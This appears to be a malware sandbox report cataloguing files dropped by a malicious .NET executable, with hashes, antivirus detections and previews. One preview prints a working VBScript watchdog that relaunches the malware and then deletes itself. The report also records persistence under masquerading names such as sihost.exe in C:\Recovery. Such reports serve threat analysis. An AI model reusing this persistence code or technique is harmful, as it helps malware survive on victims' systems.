SHA-256:	3CCA1AC8243DCD3F1E99BCA761D23885D4954357A54565E8DA6A6A74643AE163
SHA-512:	80310492161E6E685A44A16DA486BE95994862AD3DCD48EDE5DD0D68DBA9A865E9DB5DF1FF0A5AD0AD6C98A09AB52F337B51A4F996DBA21747B488DF8A95BBE5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\66fc9ff0ee96c2

Download File

Process:	C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe
File Type:	ASCII text, with very long lines (713), with no line terminators
Category:	dropped
Size (bytes):	713
Entropy (8bit):	5.900391777052802
Encrypted:	false
SSDEEP:	12:otqgdz/AXpccbiyKGtp3NIcp/7UoW6KHPg/IIqy/mC1559gkC7fhxvqMn:0qgNYXpniyl3NNa6KHyIIqCDFShUM
MD5:	D61414BDE5BA26710ED68EC762A1E6CC
SHA1:	364D78661D3CC4948A452F90E418F17AB3DE409B
SHA-256:	3FE01AE7398F224439006A8A50A58F6E08D1FACF85C1226D84C10178BAE13F14
SHA-512:	06F43E945203140B311ADE844C6403396E923875B440240173814E8136C5C28812559712CE94DBBABC69890D07F36228C587CF7FF60F6119BB853E9D1CEBC01A
Malicious:	false
Preview:	zONkNwUryvKOhPDTexdf9deJh0gG4MwvGC8wM57e8SIyWHacgJl0lysWtDCXQNwm9YIfQRGj09grVqxZZDkul5KSTmCI2jNvfgy794LPDBAlRABDQn7MnCADO0LoO7qQvvMz1zae1Vrj5iATl92PmBHdfvsJthAFVt0fyLLaMcUSUbIqz1COFbountTFGRvTUlOLrefZxbCKqzIDnCT1fvA3FG2E2FU5qA7tN68UWnanYeDylQcE73yilUGlmahsHHdp1Y0qD9f2VWekCEdlnQ8xMZH2zXs5FsgRBX6MZvB8Y6NOzfii75E0JpdcQ81pRjwmzNjpHQM1P9YPM2CUyJ7JnpHV3d5a4VryJlYm53artNlJRNQY6g0Hlm8JFOvoUv63SkGkdaY5sQaaE8EpNheXejMgmOgrHwW7Qr1rHp4gI5ZVMiFHKGaxQiZtXj8O3qy54dJWHXiin8PjK1UEJZhBWjrsSHTirpmbGdbsYt9xh2JRTzifO3FeJwjUwbE9DA08WxcqalqZZuddZZYcixTxjIRT3G67pAthBK5fX2FnNpEZTG4WClaPqDZOfIwTosuZA5bOd3Fqspk3D2AxMk4Dje08vr9OFw8e4pYXop3JgthBcfKnI9HExrzgEcdw30l5rF8XdmIgrvgz6zgQgWGGp4rN02SMMGPqIlTXgwJf0lXCK9jO6NPhteQxYvhlU6Tkg0rUg

C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Download File

Process:	C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1307648
Entropy (8bit):	7.02269427068043
Encrypted:	false
SSDEEP:	24576:c6LbAfsHAXNZjR9VnaOuufyDczqJcvofblvkIiAPN4RzmK:cqbAXXnF9hFgJcIiAQzm
MD5:	887AFE3CFC62D5BBF0F08374A9EA7CCE
SHA1:	830C58211F048A49C54C88799CD656CFD136042D
SHA-256:	3CCA1AC8243DCD3F1E99BCA761D23885D4954357A54565E8DA6A6A74643AE163
SHA-512:	80310492161E6E685A44A16DA486BE95994862AD3DCD48EDE5DD0D68DBA9A865E9DB5DF1FF0A5AD0AD6C98A09AB52F337B51A4F996DBA21747B488DF8A95BBE5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\b18e80167b8317

Download File

Process:	C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe
File Type:	ASCII text, with very long lines (860), with no line terminators
Category:	dropped
Size (bytes):	860
Entropy (8bit):	5.8992137277776004
Encrypted:	false
SSDEEP:	24:mcxe3++6VJJcpf6xbxXXekeBPiAu+XcxMu:m0evoDbVYPXuL
MD5:	44779154FBC4826CD2EC719E81CC2CF9
SHA1:	F1611A994DB7F2D183558ED12836C87432470833
SHA-256:	E3B6460A2C1CCDAC02339A9E668A0A33DB62AC6BAFDEB25EC740AF1FA524C861
SHA-512:	CAD6160C06F070884C9F62826373D8EF6F73E41CE6570458E11BCE77CF025EC876280743C64C8D1BF7837E6459901E5950B12740D74B3CCC6D16D3522D313D7E
Malicious:	false
Preview:	SDP91r6nVg8vPiK4RwfUSPsxdfVIPLQtsqSQqUty4D89K7enaUxtJsjDVcfVWxYJPODjQ4O6DrZOQsmgAsr4Ygk9GO4OzXcGpzu545WfG0qcSUxmz8UoGdusoDcB9AHpOTjb8rmFVMyi0IqwbSY0DyALEBQ0cVfGsAN9uWnIWOT4pM2gWqkrlRmaTYX7awn9qr0z4rBFpQdyfGg1IudwuyfaYwpW9qrklTN7VDlpofBUyy5N1fyqS0P1MZaICpG8i3MM2igFIyIPxKmk0bee1BRvDWv5mdm9ZCv4ltVT9shes9EBx0RkKmHhlbIfwkcpLI0uYr8GGKeIdxCEStIwLCzw5OTKlzhYQ2TjIUnF1Ke9H8DyYDNCbqdITDyKYyfQnF2kdc68GC5Aizp7Kevime7kYKQEfcrCpNVBFdU6GO5YvdkeX093D7nJISLTM1coV2VUeo2rJybXiiy5jwqpcx9skL2wRBuOwRD3IQ9t8SuOfPljdQtaLxLh2muSwFaIEMlQf5xSw7qKDvMUkTTARTD9GfAfgr722lJToUDhcanOGBeHaZsdwZ0uImKA5SwEAyRbl2qPPvi0qz2FA3FG9eGdvYKBKDmKojOStCfhtcNA09ETtE9BNpFgryqMroELIYMGlkV8XhXgQGmwT1SFDk78dsl4WTzFXC1cw7sJsBopSiPkM320W9IibOn39alEsSJOOJ9VJIWB6Rq5cAsca9tY3TBiUzKSak7AZBWC4hrNmGmJhsa8sInsivU5IbBU8ElVUpfaoqi3Rfwxr1AmYLjR6Oborb3dfXOheQz1MAUBkuaC8hNRaZ5xfUZFO1tMwFX4ROSaCIZX0hrLxYpJNmCGbbCK

C:\Recovery\sihost.exe

Download File

Process:	C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1307648
Entropy (8bit):	7.02269427068043
Encrypted:	false
SSDEEP:	24576:c6LbAfsHAXNZjR9VnaOuufyDczqJcvofblvkIiAPN4RzmK:cqbAXXnF9hFgJcIiAQzm
MD5:	887AFE3CFC62D5BBF0F08374A9EA7CCE
SHA1:	830C58211F048A49C54C88799CD656CFD136042D
SHA-256:	3CCA1AC8243DCD3F1E99BCA761D23885D4954357A54565E8DA6A6A74643AE163
SHA-512:	80310492161E6E685A44A16DA486BE95994862AD3DCD48EDE5DD0D68DBA9A865E9DB5DF1FF0A5AD0AD6C98A09AB52F337B51A4F996DBA21747B488DF8A95BBE5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\aVgRtcWKvuiHvUKTYwWvDjIq.exe.log

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\providerwebmonitor.exe.log

Download File

Process:	C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1830
Entropy (8bit):	5.3661116947161815
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
MD5:	FE86BB9E3E84E6086797C4D5A9C909F2
SHA1:	14605A3EA146BAB4EE536375A445B0214CD40A97
SHA-256:	214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
SHA-512:	07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sihost.exe.log

Download File

Process:	C:\Recovery\sihost.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Temp\3eb93d73da02516de53e5ed168763ffb45d30163.exe

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1307648
Entropy (8bit):	7.02269427068043
Encrypted:	false
SSDEEP:	24576:c6LbAfsHAXNZjR9VnaOuufyDczqJcvofblvkIiAPN4RzmK:cqbAXXnF9hFgJcIiAQzm
MD5:	887AFE3CFC62D5BBF0F08374A9EA7CCE
SHA1:	830C58211F048A49C54C88799CD656CFD136042D
SHA-256:	3CCA1AC8243DCD3F1E99BCA761D23885D4954357A54565E8DA6A6A74643AE163
SHA-512:	80310492161E6E685A44A16DA486BE95994862AD3DCD48EDE5DD0D68DBA9A865E9DB5DF1FF0A5AD0AD6C98A09AB52F337B51A4F996DBA21747B488DF8A95BBE5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\53CCoCrKuJ

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\57b77989-b658-46d2-a5dc-3af9328f5068.vbs

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	716
Entropy (8bit):	5.287888269464415
Encrypted:	false
SSDEEP:	12:9vWdTzyMsRfhMA6KKjMpVj5wJGouurv3vAGThYsTaHozv/K/ynMaSxqjdxWg9VbT:9AnyHfCATKj9pD/AEmHob/uhEjdxWgrX
MD5:	F822DE7B023A438B9046AB3C20B86070
SHA1:	B3845ED3D5D5C94C7EF4137FC02730EF24E80E56
SHA-256:	2E084CDC83C23666B6D8778BA44128E86AACFC8C8694E9E000331E59E827179E
SHA-512:	C7680CBD1F4A42A235B6DBF89C33616C342CA91517F95F9B37725F557DA1C14465E23194E9796A5A1FF4AE1500E70BEAB82A5D84CEC51D2E4ABEB11EDA3F2F89
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	On Error Resume Next....Dim processId..Dim mainFilePath....Set WS = CreateObject("WScript.Shell")..Set FSO = CreateObject("Scripting.FileSystemObject")....processId = "6660"..mainFilePath = "C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe"....Do While True...Dim isExists...isExists = false.....Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")...sQuery = "SELECT * FROM Win32_Process"...Set objItems = objWMIService.ExecQuery(sQuery).....For Each objItem In objItems....if(Trim(objItem.ProcessId) = Trim(processId)) Then .....isExists = true.....Exit For....End If...Next.....if(isExists = false) Then....WS.Exec(mainFilePath)....FSO.DeleteFile WScript.ScriptFullName....Exit Do...End If....WScript.Sleep 5000..Loop

C:\Users\user\AppData\Local\Temp\BAgkGiLyVD

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	modified
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Hbgxxnuhcv

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\LOIuD7kFeH

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\LYbi96VKxg

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MoLG4c6R4C

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\OLZnSXXgR8

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RHPeWgvtOx

Download File

Process:	C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.213660689688185
Encrypted:	false
SSDEEP:	3:MjokeOji:WveMi
MD5:	B20E913D1E26BDB466815CACD0CB6660
SHA1:	415DE896763BF5486E5FE0D8CF79511C2C4E2A14
SHA-256:	E99EFE99F6898D16D1F2FC57E07ACE19E445922872690CD96F7F81BCA485D3ED
SHA-512:	980866CFCBF5848E56509F7A91C03E9D7FBD78A5BB02E6F5826F9BB929219D4DC67257BF049D7069C735882F18427BFA5EF0206C7F67909392743B392818F7BC
Malicious:	false
Preview:	PS9i67nNS0Mj9KDRdzMIjSfFG

C:\Users\user\AppData\Local\Temp\TS5D2fN5fI

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\YmmG2ssnVf

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:gg0Pv+n:gg0en
MD5:	F32469A1B4C902DDE9C7208F9D5F2009
SHA1:	566AB19BD5C4FE181DCD7BBCB6D8F8770302F7BC
SHA-256:	62DF96421BC85A90A46A69D6C1ADEA340D669B0D8A2ACF25D480A1F333842CCB
SHA-512:	98DDBD2D46DF9E0041E70A09D996C055762C1339A14225F37CEC0986720A5659F1D1D62CF53C447407619DCE598CF8E4BF702ECF48D1C0551EC7CBEC6BFA06BB
Malicious:	false
Preview:	UpEs9XM6HjodskDNpAckVF1tx

C:\Users\user\AppData\Local\Temp\brKHjPUXOt

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ef498993-b965-4ad4-8c4b-72d20f78a4db.vbs

Download File

Process:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	492
Entropy (8bit):	5.433650537827026
